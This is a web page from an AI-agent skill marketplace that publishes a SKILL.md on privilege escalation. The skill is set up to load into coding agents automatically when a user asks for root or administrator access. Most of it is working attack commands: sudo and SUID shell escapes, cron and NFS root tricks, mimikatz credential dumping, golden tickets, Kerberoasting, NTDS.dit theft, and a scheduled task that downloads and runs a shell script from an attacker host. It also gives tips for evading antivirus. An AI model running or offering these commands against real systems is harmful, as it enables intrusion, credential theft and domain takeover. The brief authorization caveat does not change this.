How do I install Privilege Escalation Methods?

Install Privilege Escalation Methods with a single command: npx mdskills install sickn33/privilege-escalation-methods. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support Privilege Escalation Methods?

Privilege Escalation Methods works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

Privilege Escalation Methods

Name: Privilege Escalation Methods: AI Agent Skill
Rating: 8 (1 reviews)
Author: sickn33

Verified

Testing & QAIntermediate

This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/privilege-escalation-methods

Fork & Edit

Skill Advisor8.0

Comprehensive pentesting guide with actionable techniques across Linux, Windows, and AD environments

+Covers diverse privilege escalation vectors with concrete command examples
+Includes troubleshooting table and quick reference matrix for technique selection
+Provides clear prerequisites and constraints with authorization warnings
-Lacks explicit trigger conditions for when agent should activate this skill
-Could benefit from more context on detection evasion and operational security

SKILL.md

Edit in Browser

1---
2name: Privilege Escalation Methods
3description: This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# Privilege Escalation Methods
10 
11## Purpose
12 
13Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.
14 
15## Inputs/Prerequisites
16 
17- Initial low-privilege shell access on target system
18- Kali Linux or penetration testing distribution
19- Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus
20- Understanding of Windows/Linux privilege models
21- For AD attacks: Domain user credentials and network access to DC
22 
23## Outputs/Deliverables
24 
25- Root or Administrator shell access
26- Extracted credentials and hashes
27- Persistent access mechanisms
28- Domain compromise (for AD environments)
29 
30---
31 
32## Core Techniques
33 
34### Linux Privilege Escalation
35 
36#### 1. Abusing Sudo Binaries
37 
38Exploit misconfigured sudo permissions using GTFOBins techniques:
39 
40```bash
41# Check sudo permissions
42sudo -l
43 
44# Exploit common binaries
45sudo vim -c ':!/bin/bash'
46sudo find /etc/passwd -exec /bin/bash \;
47sudo awk 'BEGIN {system("/bin/bash")}'
48sudo python -c 'import pty;pty.spawn("/bin/bash")'
49sudo perl -e 'exec "/bin/bash";'
50sudo less /etc/hosts    # then type: !bash
51sudo man man            # then type: !bash
52sudo env /bin/bash
53```
54 
55#### 2. Abusing Scheduled Tasks (Cron)
56 
57```bash
58# Find writable cron scripts
59ls -la /etc/cron*
60cat /etc/crontab
61 
62# Inject payload into writable script
63echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
64chmod +x /home/user/systemupdate.sh
65 
66# Wait for execution, then:
67/bin/bash -p
68```
69 
70#### 3. Abusing Capabilities
71 
72```bash
73# Find binaries with capabilities
74getcap -r / 2>/dev/null
75 
76# Python with cap_setuid
77/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
78 
79# Perl with cap_setuid
80/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
81 
82# Tar with cap_dac_read_search (read any file)
83/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
84/usr/bin/tar -xvf key.tar
85```
86 
87#### 4. NFS Root Squashing
88 
89```bash
90# Check for NFS shares
91showmount -e <victim_ip>
92 
93# Mount and exploit no_root_squash
94mkdir /tmp/mount
95mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
96cd /tmp/mount
97cp /bin/bash .
98chmod +s bash
99```
100 
101#### 5. MySQL Running as Root
102 
103```bash
104# If MySQL runs as root
105mysql -u root -p
106\! chmod +s /bin/bash
107exit
108/bin/bash -p
109```
110 
111---
112 
113### Windows Privilege Escalation
114 
115#### 1. Token Impersonation
116 
117```powershell
118# Using SweetPotato (SeImpersonatePrivilege)
119execute-assembly sweetpotato.exe -p beacon.exe
120 
121# Using SharpImpersonation
122SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
123```
124 
125#### 2. Service Abuse
126 
127```powershell
128# Using PowerUp
129. .\PowerUp.ps1
130Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
131Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'
132```
133 
134#### 3. Abusing SeBackupPrivilege
135 
136```powershell
137import-module .\SeBackupPrivilegeUtils.dll
138import-module .\SeBackupPrivilegeCmdLets.dll
139Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit
140```
141 
142#### 4. Abusing SeLoadDriverPrivilege
143 
144```powershell
145# Load vulnerable Capcom driver
146.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
147.\ExploitCapcom.exe
148```
149 
150#### 5. Abusing GPO
151 
152```powershell
153.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" `
154  --Author DOMAIN\<USER> --Command "cmd.exe" `
155  --Arguments "/c net user Administrator Password!@# /domain" `
156  --GPOName "ADDITIONAL DC CONFIGURATION"
157```
158 
159---
160 
161### Active Directory Attacks
162 
163#### 1. Kerberoasting
164 
165```bash
166# Using Impacket
167GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request
168 
169# Using CrackMapExec
170crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt
171```
172 
173#### 2. AS-REP Roasting
174 
175```powershell
176.\Rubeus.exe asreproast
177```
178 
179#### 3. Golden Ticket
180 
181```powershell
182# DCSync to get krbtgt hash
183mimikatz# lsadump::dcsync /user:krbtgt
184 
185# Create golden ticket
186mimikatz# kerberos::golden /user:Administrator /domain:domain.local `
187  /sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500
188```
189 
190#### 4. Pass-the-Ticket
191 
192```powershell
193.\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt
194klist  # Verify ticket
195```
196 
197#### 5. Golden Ticket with Scheduled Tasks
198 
199```powershell
200# 1. Elevate and dump credentials
201mimikatz# token::elevate
202mimikatz# vault::cred /patch
203mimikatz# lsadump::lsa /patch
204 
205# 2. Create golden ticket
206mimikatz# kerberos::golden /user:Administrator /rc4:<HASH> `
207  /domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi
208 
209# 3. Create scheduled task
210schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" `
211  /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'"
212schtasks /run /s DOMAIN /TN "enterprise"
213```
214 
215---
216 
217### Credential Harvesting
218 
219#### LLMNR Poisoning
220 
221```bash
222# Start Responder
223responder -I eth1 -v
224 
225# Create malicious shortcut (Book.url)
226[InternetShortcut]
227URL=https://facebook.com
228IconIndex=0
229IconFile=\\attacker_ip\not_found.ico
230```
231 
232#### NTLM Relay
233 
234```bash
235responder -I eth1 -v
236ntlmrelayx.py -tf targets.txt -smb2support
237```
238 
239#### Dumping with VSS
240 
241```powershell
242vssadmin create shadow /for=C:
243copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
244copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
245```
246 
247---
248 
249## Quick Reference
250 
251| Technique | OS | Domain Required | Tool |
252|-----------|-----|-----------------|------|
253| Sudo Binary Abuse | Linux | No | GTFOBins |
254| Cron Job Exploit | Linux | No | Manual |
255| Capability Abuse | Linux | No | getcap |
256| NFS no_root_squash | Linux | No | mount |
257| Token Impersonation | Windows | No | SweetPotato |
258| Service Abuse | Windows | No | PowerUp |
259| Kerberoasting | Windows | Yes | Rubeus/Impacket |
260| AS-REP Roasting | Windows | Yes | Rubeus |
261| Golden Ticket | Windows | Yes | Mimikatz |
262| Pass-the-Ticket | Windows | Yes | Rubeus |
263| DCSync | Windows | Yes | Mimikatz |
264| LLMNR Poisoning | Windows | Yes | Responder |
265 
266---
267 
268## Constraints
269 
270**Must:**
271- Have initial shell access before attempting escalation
272- Verify target OS and environment before selecting technique
273- Use appropriate tool for domain vs local escalation
274 
275**Must Not:**
276- Attempt techniques on production systems without authorization
277- Leave persistence mechanisms without client approval
278- Ignore detection mechanisms (EDR, SIEM)
279 
280**Should:**
281- Enumerate thoroughly before exploitation
282- Document all successful escalation paths
283- Clean up artifacts after engagement
284 
285---
286 
287## Examples
288 
289### Example 1: Linux Sudo to Root
290 
291```bash
292# Check sudo permissions
293$ sudo -l
294User www-data may run the following commands:
295    (root) NOPASSWD: /usr/bin/vim
296 
297# Exploit vim
298$ sudo vim -c ':!/bin/bash'
299root@target:~# id
300uid=0(root) gid=0(root) groups=0(root)
301```
302 
303### Example 2: Windows Kerberoasting
304 
305```bash
306# Request service tickets
307$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request
308 
309# Crack with hashcat
310$ hashcat -m 13100 hashes.txt rockyou.txt
311```
312 
313---
314 
315## Troubleshooting
316 
317| Issue | Solution |
318|-------|----------|
319| sudo -l requires password | Try other enumeration (SUID, cron, capabilities) |
320| Mimikatz blocked by AV | Use Invoke-Mimikatz or SafetyKatz |
321| Kerberoasting returns no hashes | Check for service accounts with SPNs |
322| Token impersonation fails | Verify SeImpersonatePrivilege is present |
323| NFS mount fails | Check NFS version compatibility (vers=2,3,4) |
324 
325---
326 
327## Additional Resources
328 
329For detailed enumeration scripts, use:
330- **LinPEAS**: Linux privilege escalation enumeration
331- **WinPEAS**: Windows privilege escalation enumeration
332- **BloodHound**: Active Directory attack path mapping
333- **GTFOBins**: Unix binary exploitation reference
334

Full transparency — inspect the skill content before installing.